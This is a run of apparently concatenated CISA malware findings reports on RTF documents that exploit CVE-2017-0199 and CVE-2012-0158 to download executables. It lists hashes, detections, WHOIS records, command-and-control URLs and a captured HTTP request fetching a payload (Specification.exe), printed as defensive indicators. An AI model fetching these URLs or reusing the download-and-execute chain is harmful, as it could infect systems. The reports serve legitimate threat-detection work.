btt5sxcx90.com

rottastics36w.net

Findings

7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c

Tags

CVE-2017-0199, downloader, dropper, trojan

Details
Name: 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c.bin
Size: 37510 bytes
Type: Rich Text Format data, version 1, unknown character set
MD5: 775390eeeff4d54b9c3941ef1f220c9f
SHA1: 3770051d8cb7df081b5409f2be3b8d6c916a2755
SHA256: 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c
SHA512: 1c590c54a76c556bebc0c5b99d1c14051716c4e01b9731149543722ff297748a8efb3acc136a6ecc2a7525c0af999e2ea1cfe9788f57d56071e843b60f464d63
ssdeep: 384:C8W68Kw0zybdKk907U7UD1cYOs8BxJJ2PAi6rGsNAYAXJqskps:C8O07U7UDuYOs8BxX2PEhAZq1s
Entropy: 4.782672

Antivirus
Ahnlab: RTF/Cve-2017-0199
Antiy: Trojan[Exploit]/RTF.CVE-2017-0199
Avira: EXP/W2000.Agent.12344
BitDefender: Trojan.Exploit.ANWK
ClamAV: Doc.Dropper.Agent-6249686-0
Cyren: CVE-2017-0199.B!Camelot
ESET: Win32/Exploit.CVE-2017-0199.A trojan
Emsisoft: Trojan.Exploit.ANWK (B)
Ikarus: Exploit.CVE-2017-0199
McAfee: Exploit-CVE2017-0199.c
Microsoft Security Essentials: Exploit:O97M/CVE-2017-0199!dha
NANOAV: Exploit.Ole2.CVE-2017-0199.equmby
NetGate: Exploit.Win32.Generic
Quick Heal: Exp.RTF.CVE-2017-0199
Sophos: Troj/DocDrop-TJ
Symantec: Trojan.Mdropper
TACHYON: Downloader/RTF.CVE-2017-0199
TrendMicro: TROJ_CV.2BCCE136
TrendMicro House Call: TROJ_CV.2BCCE136
VirusBlokAda: Exploit.O97M.Blinky.B

YARA Rules

No matches found.

ssdeep Matches
96 ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e
96 c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629

Relationships
7f2a499891... Connected_To rottastics36w.net

Description

7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c.bin is a malicious Rich Text Format (RTF) document. When the file is opened it will display an error message to the victim (Screenshot 1) while attempting to download the file, 'template.doc' from the domain, rottastics36w.net. The domain did not resolve to an IP address at the time of analysis.

Screenshots

Screenshot 1. Error Message -

rottastics36w.net

Tags

command-and-control

URLs
  • http://rottastics36w.net/template.doc
Whois

Domain name: rottastics36w.net
Registry Domain ID: 77428276_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.eranet.com
Registrar URL: http://www.tnet.hk/
Update Date: 2017-04-02T16:00:00Z
Creation Date: 2017-04-03T09:14:21Z
Registrar Registration Expiration Date: 2018-04-02T16:00:00Z
Registrar: ERANET INTERNATIONAL LIMITED
Registrar IANA ID: 1868
Registrar Abuse Contact Email: support@eranet.com
Registrar Abuse Contact Phone: +852.35685366
Reseller:    
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientHold http://www.icann.org/epp#clientHold
Registry Registrant ID:
Registrant Name: Robert Ruthven
Registrant Organization: Gamblin Artists Colors
Registrant Street: 323 SE Division Pl
Registrant City: Portland
Registrant Province/state: OR
Registrant Postal Code: 97202
Registrant Country: US
Registrant Phone: +1.5034359411
Registrant Phone EXT:
Registrant Fax: +1.5034359411
Registrant Fax EXT:
Registrant Email: jenniemarc@mail.com
Registry Admin ID:
Admin Name: Robert Ruthven
Admin Organization: Gamblin Artists Colors
Admin Street: 323 SE Division Pl
Admin City: Portland
Admin Province/state: OR
Admin Postal Code: 97202
Admin Country: US
Admin Phone: +1.5034359411
Admin Phone EXT:
Admin Fax: +1.5034359411
Admin Fax EXT:
Admin Email: jenniemarc@mail.com
Registry Tech ID:
Tech Name: Robert Ruthven
Tech Organization: Gamblin Artists Colors
Tech Street: 323 SE Division Pl
Tech City: Portland
Tech Province/state: OR
Tech Postal Code: 97202
Tech Country: US
Tech Phone: +1.5034359411
Tech Phone EXT:
Tech Fax: +1.5034359411
Tech Fax EXT:
Tech Email: jenniemarc@mail.com

Relationships
rottastics36w.net Connected_From 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c

Description

When the document, 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c.bin is opened an attempt is made to download the file 'template.doc' from this domain. The domain does not resolve to an IP address.

c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629

Tags

CVE-2017-0199, downloader, dropper, trojan

Details
Name: c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629.bin
Size: 37517 bytes
Type: Rich Text Format data, version 1, unknown character set
MD5: cd60a118fede29f93363a807ce19c208
SHA1: 09048811d050bd5f29be36a4b145709f26d4185a
SHA256: c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629
SHA512: 158dc4490e3d4bc0777d8af4e68882d7346deeb2768f02f6003478ee5941ba5ce9c6e342f3d4b91a760c7ff8b77959117f828a6b6ca77d298802eb6381358697
ssdeep: 384:C8W68Kw0zybdKk907U7UYcYOs8BaJJ2PAi6rGsNAYAXJqskps:C8O07U7UxYOs8BaX2PEhAZq1s
Entropy: 4.782730

Antivirus
Ahnlab: RTF/Exploit
Antiy: Trojan[Exploit]/RTF.CVE-2017-0199
Avira: EXP/W2000.Agent.12345
BitDefender: Trojan.Agent.CFWP
ClamAV: Rtf.Exploit.CVE_2017_0199-6336824-0
Cyren: CVE-2017-0199.B!Camelot
ESET: Win32/Exploit.CVE-2017-0199.A trojan
Emsisoft: Trojan.Agent.CFWP (B)
Ikarus: Exploit.CVE-2017-0199
McAfee: Exploit-CVE2017-0199.c
Microsoft Security Essentials: Exploit:O97M/Blinky.B
NANOAV: Exploit.Ole2.CVE-2017-0199.equmby
NetGate: Exploit.Win32.Generic
Quick Heal: Exp.RTF.CVE-2017-0199
Sophos: Troj/DocDrop-TJ
Symantec: Trojan.Mdropper
TACHYON: Downloader/RTF.CVE-2017-0199
TrendMicro: TROJ_CV.5BA615B9
TrendMicro House Call: TROJ_CV.5BA615B9
VirusBlokAda: Exploit.O97M.Blinky.B

YARA Rules

No matches found.

ssdeep Matches
96 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c
97 ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e

Relationships
c98f34e4e8... Connected_To btt5sxcx90.com

Description

c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629.bin is a malicious Rich Text Format (RTF) document. When the file is opened, it displays an error message to the victim (Screenshot 1) while attempting to download the file 'template.doc' from the domain btt5sxcx90.com. The domain did not resolve to an IP address at the time of analysis.

Screenshots

Screenshot 1. Error Message

btt5sxcx90.com

Tags

command-and-control

URLs
  • http://btt5sxcx90.com/template.doc

Relationships

  • btt5sxcx90.com Connected_From c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629

Description

When the document c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629.bin is opened, an attempt is made to download the file 'template.doc' from this domain. The domain does not resolve to an IP address.

Relationship Summary

  • 7f2a499891... Connected_To rottastics36w.net
  • rottastics36w.net Connected_From 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c
  • c98f34e4e8... Connected_To btt5sxcx90.com
  • btt5sxcx90.com Connected_From c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.


MIFR-10079683-1.v2

US-CERT All NCAS Products - Tue, 05/12/2020 - 16:21
Original release date: May 12, 2020
  Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This report contains information obtained from automated analysis and is not intended to be a complete description of the submitted sample. Results may be limited due to the complexity of the samples, or due to the ability of the samples to defend against automated analysis techniques. If additional information is required, please contact the Cybersecurity and Infrastructure Security Agency (CISA) using the information provided at the end of this report.

CISA received one artifact, ff4138ca9119ab0381ad6575f041e633, which appeared to be an RTF document crafted to perform penetration testing for the CVE-2012-0158 vulnerability found in Microsoft Office 2003, 2007 and 2010. It is actually an obfuscated RTF that, when opened in Microsoft Word, connected to nanocoatingindonesia.co.id and attempted to download an executable named Specification.exe, copy it over to word.scr and execute it immediately. At the time of this analysis, the domain returned HTTP 404 Not Found to the HTTP GET request.

For a downloadable copy of IOCs, see MIFR-10079683-1.v2.stix.

Files (1)

ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc (ff4138ca9119ab0381ad6575f041e6...)

Domains (1)

nanocoatingindonesia.co.id

IPs (1)

114.199.90.60

Findings

ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc

Tags

CVE-2012-0158, dropper, trojan

Details

  • Name: ff4138ca9119ab0381ad6575f041e633
  • Size: 1203123 bytes
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: ff4138ca9119ab0381ad6575f041e633
  • SHA1: a3639691eb5fa1b41225ff35791f9931b62aeacd
  • SHA256: ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc
  • SHA512: 42b47b48420367b4d4ce6e94d0d6e776d4ac903873324abd09c4e7776cf0cb5c79796421a6072f5d5624f09eb4080ed69799e6ebb23e68d3cc18f76240c3d1e9
  • ssdeep: 96:GiIH6Q+Y2pbrh8mM/iBq7KWJZ6rBcClgJr3u17ejofQqa5hstzaqiFi12B7FiJi6:GlH6rfh8mQ7KraIwmzOiJN64g6mS12y
  • Entropy: 2.667311

Antivirus

  • Ahnlab: RTF/Exploit
  • Antiy: Trojan[Exploit]/Office.CVE-2012-0158.h
  • Avira: EXP/CVE-2012-0158.TJ
  • BitDefender: Exploit.RTF.CVE-2012-0158.H
  • ClamAV: Rtf.Dropper.Agent-1557037
  • Emsisoft: Exploit.RTF.CVE-2012-0158.H (B)
  • Ikarus: Trojan.Win32.Exploit
  • McAfee: Exploit-CVE2012-0158.w
  • Microsoft Security Essentials: Exploit:Win32/CVE-2012-0158
  • NANOAV: Exploit.Rtf.Heuristic-rtf.dinbqn
  • Quick Heal: Exp.RTF.Obfus.Gen
  • Sophos: Troj/DocDrop-ID
  • Symantec: Trojan.Mdropper
  • TACHYON: Exploit.RTF.CVE-2012-0158.H
  • TrendMicro: TROJ_MD.E9643850
  • TrendMicro House Call: TROJ_MD.E9643850

YARA Rules

No matches found.

ssdeep Matches

  • 99: 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5

Relationships

  • ebbca8bb8e... Connected_To nanocoatingindonesia.co.id

Description

FF4138CA9119AB0381AD6575F041E633 is an obfuscated RTF document that, when examined under a hexadecimal editor, appeared to be crafted to perform penetration testing. Close to the end of the file, the ASCII data "For pentesting purposes only!" and the MD5 hash value of the RTF were found.

However, when the RTF was opened in Microsoft Word, it sent an HTTP GET request to the domain nanocoatingindonesia.co.id in order to download a binary named Specification.exe. If successfully downloaded, it would copy Specification.exe to word.scr and immediately execute it.

When the RTF was examined under a debugger, word.scr was located in the C:\Windows\system32 directory; word.scr ran on the system, followed by a system crash and reboot. However, when the RTF was opened without a debugger, word.scr was copied to the same directory where the RTF was located and the system did not crash.

At the time of this analysis, nanocoatingindonesia.co.id returned HTTP 404 Not Found to the HTTP GET request for the Specification.exe binary.


nanocoatingindonesia.co.id

Tags

command-and-control

HTTP Sessions
  • GET /1/Specification.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: nanocoatingindonesia.co.id
    Connection: Keep-Alive

    HTTP/1.1 404 Not Found
    Date: Fri, 19 Aug 2016 xx:xx:xx GMT
    Server: Apache
    Content-Length: 336
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /1/Specification.exe was not found on this server.</p>
    <p>Additionally, a 404 Not Found
    error was encountered while trying to use an ErrorDocument to handle the request.</p>
    </body></html

Relationships

  • nanocoatingindonesia.co.id Resolved_To 114.199.90.60
  • nanocoatingindonesia.co.id Connected_From ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc

114.199.90.60

Relationships

  • 114.199.90.60 Resolved_To nanocoatingindonesia.co.id

Relationship Summary

  • ebbca8bb8e... Connected_To nanocoatingindonesia.co.id
  • nanocoatingindonesia.co.id Resolved_To 114.199.90.60
  • nanocoatingindonesia.co.id Connected_From ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc
  • 114.199.90.60 Resolved_To nanocoatingindonesia.co.id

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".


MIFR-10079682-1.v2

US-CERT All NCAS Products - Tue, 05/12/2020 - 16:14
Original release date: May 12, 2020
  Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This report contains information obtained from automated analysis and is not intended to be a complete description of the submitted sample. Results may be limited due to the complexity of the samples, or due to the ability of the samples to defend against automated analysis techniques. If additional information is required, please contact the Cybersecurity and Infrastructure Security Agency (CISA) using the information provided at the end of this report.

One malicious Rich Text Format file was submitted for analysis. This file is designed to download and execute a payload from a C2 server.

For a downloadable copy of IOCs, see MIFR-10079682-1.v2.stix.

Files (1)

41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5 (16f92777f3dca38f0293cfc66edaa6...)

Domains (1)

nanocoatingindonesia.co.id

Findings

41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5

Tags

CVE-2012-0158, dropper, trojan

Details

  • Name: 16f92777f3dca38f0293cfc66edaa6cb
  • Size: 1202347 bytes
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 16f92777f3dca38f0293cfc66edaa6cb
  • SHA1: 8ced8019a845bd1d555172a96b1ebfa594bb9e46
  • SHA256: 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5
  • SHA512: d1b5d0c4d430068e9028b6621a463b772fd2543df803fdc6e54ca5929b56f2791c5058193c6d588372987fa80ed871531fb752326147281ec6645314c37f284a
  • ssdeep: 96:GiIH6Q+Y2pbrh8mM/iBq7KWJZ6rBcClgJr3u17ejofQqa5hstzaqiFi12B7FiJiJ:GlH6rfh8mQ7KraIwmzOiJN64g6mS12x
  • Entropy: 2.667135

Antivirus

  • Ahnlab: RTF/Exploit
  • Antiy: Trojan[Exploit]/Office.CVE-2012-0158.h
  • Avira: EXP/CVE-2012-0158.VZ
  • BitDefender: Exploit.RTF-ObfsStrm.Gen
  • Emsisoft: Exploit.RTF-ObfsStrm.Gen (B)
  • Ikarus: Trojan.Win32.Exploit
  • McAfee: Exploit-CVE2012-0158.w
  • Microsoft Security Essentials: Exploit:Win32/CVE-2012-0158
  • NANOAV: Exploit.Rtf.Heuristic-rtf.dinbqn
  • Quick Heal: Exp.RTF.Obfus.Gen
  • Sophos: Troj/DocDrop-ID
  • Symantec: Trojan.Mdropper
  • TACHYON: Exploit.RTF-ObfsStrm.Gen
  • TrendMicro: TROJ_MD.E9643850
  • TrendMicro House Call: TROJ_MD.E9643850

YARA Rules

No matches found.

ssdeep Matches

  • 99: ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc

Relationships

  • 41bc1f68ca... Connected_From nanocoatingindonesia.co.id

Description

This file is a malicious RTF file. This file is designed to download and execute a payload from a C2 server.

The following is the URI that the file used to download:

--begin URI--
nanocoatingindonesia.co.id/1/Order.exe
--end URI--

Analysis indicates that this file will download and install a payload on the compromised system.

The payload that the malware attempted to download was not available for further analysis.

nanocoatingindonesia.co.id

Tags

command-and-control

URLs
  • nanocoatingindonesia.co.id/1/Order.exe

Relationships

  • nanocoatingindonesia.co.id Connected_To 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5

Relationship Summary

  • 41bc1f68ca... Connected_From nanocoatingindonesia.co.id
  • nanocoatingindonesia.co.id Connected_To 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".
